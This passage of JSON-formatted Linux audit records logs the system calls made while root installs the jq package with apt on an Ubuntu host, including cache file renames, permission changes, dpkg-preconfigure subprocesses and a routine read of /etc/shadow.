"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.145:403",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x564c5510bf80",
"0x564c5505ad70",
"0x3a",
"0x564c5500b010"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial/",
"inode": 138208,
"dev": "fd:00",
"mode": "0o40700",
"ouid": 105,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/apt/archives/",
"inode": 138207,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/cache/apt/archives/partial/libonig5_6.9.4-1_amd64.deb",
"inode": 133236,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"inode": 133236,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.269:404",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 94,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c550c4d70",
"0x0",
"0x0",
"0x7f37c18d2ac0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"inode": 133246,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 105,
"ogid": 65534,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.273:405",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c550c4d70",
"0x1a4",
"0x7ffe41acca30",
"0x7f37c18d2ac0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"inode": 133246,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.273:406",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x564c550c4d70",
"0x564c550f1c30",
"0x45",
"0x17"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial/",
"inode": 138208,
"dev": "fd:00",
"mode": "0o40700",
"ouid": 105,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/apt/archives/",
"inode": 138207,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/cache/apt/archives/partial/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"inode": 133246,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"inode": 133246,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.333:407",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 94,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c550dc230",
"0x0",
"0x0",
"0x7f37c18d2ac0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"inode": 133290,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 105,
"ogid": 65534,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.333:408",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c550dc230",
"0x1a4",
"0x7ffe41acca30",
"0x7f37c18d2ac0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"inode": 133290,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.337:409",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x564c550dc230",
"0x564c550dce20",
"0x41",
"0x17"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial/",
"inode": 138208,
"dev": "fd:00",
"mode": "0o40700",
"ouid": 105,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/apt/archives/",
"inode": 138207,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/cache/apt/archives/partial/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"inode": 133290,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"inode": 133290,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.337:410",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x564c550d57a0",
"0x7f37c1cad377",
"0x64",
"0x4"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/log/apt/",
"inode": 11717,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/log/apt/eipp.log.xz",
"inode": 2729,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.413:411",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7610,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "sh",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x7f37c1cb4610",
"0x7ffe41accdd0",
"0x564c550d6b70",
"0x564c5502a62f"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/bin/sh",
"-c",
"/usr/sbin/dpkg-preconfigure --apt || true"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"-c",
"/usr/sbin/dpkg-preconfigure --apt || true"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.417:412",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 3,
"ppid": 7610,
"pid": 7611,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg-preconfigu",
"exe": "/usr/bin/perl",
"key": "rootcmd",
"ARGV": [
"0x558773b65be0",
"0x558773b65c30",
"0x5587750a1768",
"0x7fee73330850"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/dpkg-preconfigure",
"inode": 794080,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/bin/perl",
"inode": 787298,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-c",
"/usr/sbin/dpkg-preconfigure --apt || true"
],
"launch_time": 1632470477.413,
"ppid": 7575
}
}
{
"ID": "1632470477.465:413",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7611,
"pid": 7612,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg-preconfigu",
"exe": "/usr/bin/perl",
"key": "rootcmd",
"ARGV": [
"0x7ffd726353e0",
"0x5607cbf899f0",
"0x5607cbb47980",
"0x8"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/local/sbin/locale",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.417,
"ppid": 7610
}
}
{
"ID": "1632470477.469:414",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7611,
"pid": 7612,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg-preconfigu",
"exe": "/usr/bin/perl",
"key": "rootcmd",
"ARGV": [
"0x7ffd726353e0",
"0x5607cbf899f0",
"0x5607cbb47980",
"0x8"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/local/bin/locale",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.417,
"ppid": 7610
}
}
{
"ID": "1632470477.469:415",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7611,
"pid": 7612,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg-preconfigu",
"exe": "/usr/bin/perl",
"key": "rootcmd",
"ARGV": [
"0x7ffd726353e0",
"0x5607cbf899f0",
"0x5607cbb47980",
"0x8"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/locale",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.417,
"ppid": 7610
}
}
{
"ID": "1632470477.469:416",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7611,
"pid": 7612,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "locale",
"exe": "/usr/bin/locale",
"key": "rootcmd",
"ARGV": [
"0x7ffd726353e0",
"0x5607cbf899f0",
"0x5607cbb47980",
"0x8"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"locale",
"charmap"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/locale",
"inode": 787192,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.417,
"ppid": 7610
}
}
{
"ID": "1632470477.477:417",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 257,
"success": "yes",
"exit": 4,
"items": 1,
"ppid": 7610,
"pid": 7611,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg-preconfigu",
"exe": "/usr/bin/perl",
"key": "etcpasswd",
"ARGV": [
"0xffffff9c",
"0x7f18bb4d71a1",
"0x80000",
"0x0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/etc/shadow",
"inode": 133340,
"dev": "fd:00",
"mode": "0o100640",
"ouid": 0,
"ogid": 42,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-c",
"/usr/sbin/dpkg-preconfigure --apt || true"
],
"launch_time": 1632470477.413,
"ppid": 7575
}
}
{
"ID": "1632470477.537:418",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7611,
"pid": 7613,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "sh",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x5607cb50cea8",
"0x7ffd72637c50",
"0x5607cbb47980",
"0x7ffd72637c90"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"sh",
"-c",
"stty -a 2>/dev/null"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"sh",
"-c",
"stty -a 2>/dev/null"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.417,
"ppid": 7610
}
}
{
"ID": "1632470477.541:419",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7613,
"pid": 7614,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "stty",
"exe": "/usr/bin/stty",
"key": "rootcmd",
"ARGV": [
"0x55f934b0d7d8",
"0x55f933d75be0",
"0x55f933d75c18",
"0x7fe8de579850"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"stty",
"-a"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/stty",
"inode": 787514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"stty",
"-a"
]
},
"PARENT_INFO": {
"ARGV": [
"sh",
"-c",
"stty -a 2>/dev/null"
],
"launch_time": 1632470477.537,
"ppid": 7611
}
}
{
"ID": "1632470477.541:420",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7611,
"pid": 7615,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "sh",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x5607cb50cea8",
"0x7ffd72637c50",
"0x5607cbb47980",
"0x7ffd72637c90"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"sh",
"-c",
"stty -a 2>/dev/null"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"sh",
"-c",
"stty -a 2>/dev/null"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.417,
"ppid": 7610
}
}
{
"ID": "1632470477.545:421",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7615,
"pid": 7616,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "stty",
"exe": "/usr/bin/stty",
"key": "rootcmd",
"ARGV": [
"0x55dcb11c37d8",
"0x55dcb02e7be0",
"0x55dcb02e7c18",
"0x7f124b928850"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"stty",
"-a"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/stty",
"inode": 787514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"stty",
"-a"
]
},
"PARENT_INFO": {
"ARGV": [
"sh",
"-c",
"stty -a 2>/dev/null"
],
